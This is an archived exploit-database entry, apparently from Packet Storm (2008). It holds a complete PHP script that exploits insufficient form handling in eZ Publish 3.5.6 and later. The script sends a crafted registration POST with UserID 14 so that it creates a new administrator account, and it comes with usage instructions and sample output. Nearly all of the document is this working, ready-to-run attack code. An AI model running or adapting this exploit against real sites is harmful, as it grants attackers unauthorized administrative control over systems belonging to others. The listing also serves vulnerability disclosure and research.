eZ Publish Privilege Escalation

2008-12-10T00:00:00
ID PACKETSTORM:72837
Type packetstorm
Reporter s4avrd0w
Modified 2008-12-10T00:00:00

Description

                                        
                                            `<?php  
  
/*  
eZ Publish privilege escalation exploit by s4avrd0w [s4avrd0w@p0c.ru]  
Versions affected >= 3.5.6  
Resolved in 3.9.5, 3.10.1, 4.0.1  
More info: http://ez.no/developer/security/security_advisories/ez_publish_3_9/ezsa_2008_003_insufficient_form_handling_made_privilege_escalation_possible  
  
* tested on version 3.9.0  
  
usage:   
  
# ./eZPublish_privilege_escalation_exploit.php -u=username -p=password -e=email -s=EZPublish_server  
  
The options are required:  
  
-u Login of the new admin on eZ Publish  
-p Password of the new admin on eZ Publish  
-e Email where to go the letter for activation new admin account  
-s Target for privilege escalation  
  
example:  
  
# ./eZPublish_privilege_escalation_exploit.php -u=toor -p=P@ssw0rd -e=toor@mail.ru -s=http://127.0.0.1/  
[+] Exploit successfully sending  
[+] Activate your new account and be registered in system using toor/P@ssw0rd  
*/  
  
function help_argc($script_name)  
{  
print "  
usage:  
  
# ./".$script_name." -u=username -p=password -e=email -s=EZPublish_server  
  
The options are required:  
-u Login of the new admin on eZ Publish  
-p Password of the new admin on eZ Publish  
-e Email where to go the letter for activation new admin account  
-s Target for privilege escalation  
  
example:  
  
# ./".$script_name." -u=toor -p=P@ssw0rd -e=toor@mail.ru -s=http://127.0.0.1/  
[+] Exploit successfully sending  
[+] Activate your new account and be registered in system using toor/P@ssw0rd  
  
";  
}  
  
function successfully($login,$password)  
{  
print "  
[+] Exploit successfully sending  
[+] Activate your new account and be registered in system using $login/$password  
";  
}  
  
if ($argc != 5 || in_array($argv[1], array('--help', '-help', '-h', '-?')))  
{  
help_argc($argv[0]);  
exit(0);  
}  
else  
{  
$ARG = array();   
foreach ($argv as $arg) {   
if (strpos($arg, '-') === 0) {   
$key = substr($arg,1,1);  
if (!isset($ARG[$key])) $ARG[$key] = substr($arg,3,strlen($arg));   
}   
}  
  
if ($ARG[u] && $ARG[p] && $ARG[e] && $ARG[s])  
{  
  
$post_fields = array(  
'ContentObjectAttribute_data_user_login_30' => $ARG[u],  
'ContentObjectAttribute_data_user_password_30' => $ARG[p],  
'ContentObjectAttribute_data_user_password_confirm_30' => $ARG[p],  
'ContentObjectAttribute_data_user_email_30' => $ARG[e],  
'UserID' => '14',  
'PublishButton' => '1'  
);  
  
$headers = array(  
'User-Agent' => 'Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14',  
'Referer' => $ARG[s]  
);  
  
$res_http = new HttpRequest($ARG[s]."/user/register", HttpRequest::METH_POST);  
$res_http->addPostFields($post_fields);  
$res_http->addHeaders($headers);  
try {  
$response = $res_http->send()->getBody();  
  
if (eregi("success", $response))  
{  
successfully($ARG[u],$ARG[p]);  
}  
else  
{  
print "[-] Exploit failed";  
}  
  
} catch (HttpException $exception) {  
  
print "[-] Not connected";  
exit(0);  
  
}  
  
}  
else  
{  
help_argc($argv[0]);  
exit(0);  
}   
}  
  
?>  
  
`